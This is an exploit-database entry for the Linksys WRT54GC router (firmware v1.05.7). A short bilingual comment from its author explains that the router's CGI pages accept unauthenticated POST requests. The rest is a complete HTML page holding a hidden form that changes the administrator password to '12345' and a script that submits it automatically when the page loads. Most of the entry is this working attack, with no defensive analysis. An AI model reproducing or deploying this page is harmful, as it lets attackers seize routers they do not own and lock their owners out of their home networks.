ID

VAR-E-200904-0719

TITLE

Linksys WRT54GC Password Changer

DESCRIPTION

Linksys WRT54GC administration password changing exploit.

AFFECTED PRODUCTS

EXPLOIT

<!--
***************
* Gabriel Lima - gabriel@falandodeseguranca.com
* www.falandodeseguranca.com
***************

(English:)
Linksys WRT54GC - Administration Password Change
The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST request,
as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration

(Portugu\xeas:)
Linksys WRT54GC - Mudan\xe7a de Senha
O roteador WRT54GC parece n\xe3o verificar a autentica\xe7\xe3o do administrador em seus arquivos .CGI, aceitando qualquer envio
de POST como o de mudan\xe7a de senha. Abaixo, um exemplo de formul\xe1rio que muda a senha e o login de administrador para 12345.
Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administra\xe7\xe3o Local e remota.

Credits:
Gabriel Lima. gabriel@falandodeseguranca.com
-->

<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<!-- C\xf3digo de envio autom\xe1tico do formul\xe1rio -->

<SCRIPT language="JavaScript">
document.senha.submit();
</SCRIPT>

</body></html>

EXPLOIT HASH

PRICE

free

TAGS

CREDITS

Gabriel Lima

EXTERNAL IDS

SOURCES

LAST UPDATE DATE

2022-07-27T09:41:13.112000+00:00

SOURCES RELEASE DATE